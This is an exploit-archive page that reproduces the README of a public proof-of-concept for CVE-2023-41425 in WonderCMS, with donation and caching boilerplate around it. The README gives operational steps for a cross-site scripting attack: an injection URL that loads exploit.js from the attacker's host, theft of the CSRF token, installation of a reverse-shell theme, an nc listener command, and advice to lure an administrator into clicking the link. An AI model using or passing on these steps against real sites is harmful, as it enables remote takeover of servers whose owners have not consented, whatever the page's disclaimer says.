Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-41425 PoC — WonderCMS 安全漏洞

Source
https://github.com/samu21req/CVE-2023-41425
Associated Vulnerability
Title:WonderCMS 安全漏洞 (CVE-2023-41425)
Description:WonderCMS是一套基于PHP的开源内容管理系统(CMS)。 WonderCMS v.3.2.0版本至v.3.4.2版本存在安全漏洞。攻击者利用该漏洞通过上传到installModule组件的特制脚本执行任意代码。
Readme
# WonderCMS Exploit for CVE-2023-41425

## Description
This script exploits a Cross-Site Scripting (XSS) vulnerability in WonderCMS to deliver a reverse shell to the attacker's machine. It works by leveraging the XSS to inject malicious JavaScript, steal the CSRF token, and install a reverse shell theme. There is no need
to be admin or know admin password. 

## How It Works
1. The attacker serves the `exploit.js` file via a web server (e.g., Python's `http.server`).
2. The attacker crafts a malicious URL that injects this script into the target site.
3. The script:
   - Steals the CSRF token from the page.
   - Sends requests to install and execute a reverse shell theme on the victim's server.
   - Triggers the reverse shell to connect back to the attacker's machine.

## Prerequisites
- A web server to host `exploit.js`.
- A listener for the reverse shell (e.g., `nc -lvnp <port>`).
- Reverse shell ZIP file available online (e.g., `rev.zip`).
- Admin to click on malicious link (e.g. Social Engineering).

## Usage
1. **Configure the script:**
   Edit the constants in `exploit.js`:
   - `CMS_URL`: Base URL of the target (e.g., `http://victim.abc/cms`).
   - `ATTACKER_IP`: Your machine's IP address (e.g., `10.10.14.123`).
   - `ATTACKER_LISTENER_PORT`: The port you're listening on (e.g., `4444`).
   - `REV_SHELL_URL`: The URL hosting your reverse shell ZIP file (e.g., `http://10.10.14.123/rev.zip`).

2. **Host the script:**
   Start a web server in the directory containing `exploit.js`:
   ```
   python3 -m http.server 8000
   ```

3. **Craft the exploit URL:** 
    Replace `<ATTACKER_IP>` and `<PORT>` with your details in the following template. Fill in `<WONDER_CMS_ROOT_URL` with the URL of the installation of WonderCMS in the victim website. To find this, you can look for the login url, then the root URL is one directory above, e.g. `http://victim.abc/wondercms/loginURL/`, the root url would be `http://victim.abc/wondercms/`
    ```
    http://<WONDER_CMS_ROOT_URL>/index.php?page=loginURL?\"></form><script+src=\"http://<ATTACKER_IP>:<PORT>/exploit.js\"></script><form+action=\"
    ```

4. **Execute the attack:** 
    Share the malicious URL with the target administrator. Once the link is visited, the reverse shell is delivered, and the attacker gets access.

5. **Start the listener:** 
    On your machine, run:
    ```
    nc -lvnp <ATTACKER_LISTENER_PORT>
    ```

## Disclaimer
This code is intended for educational purposes only. Do not use it on systems you do not own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.

## References
This is based on https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413 by https://github.com/prodigiousMind with a few tweaks and fixes. Hopefully more intuitive to use.

## License
MIT License
File Snapshot

 [4.0K]  /data/pocs/3eeea610c7a7857f77038aa810efd9e60999f858
├── [2.3K]  exploit.js
├── [1.0K]  LICENSE
├── [2.6K]  main.zip
└── [2.8K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.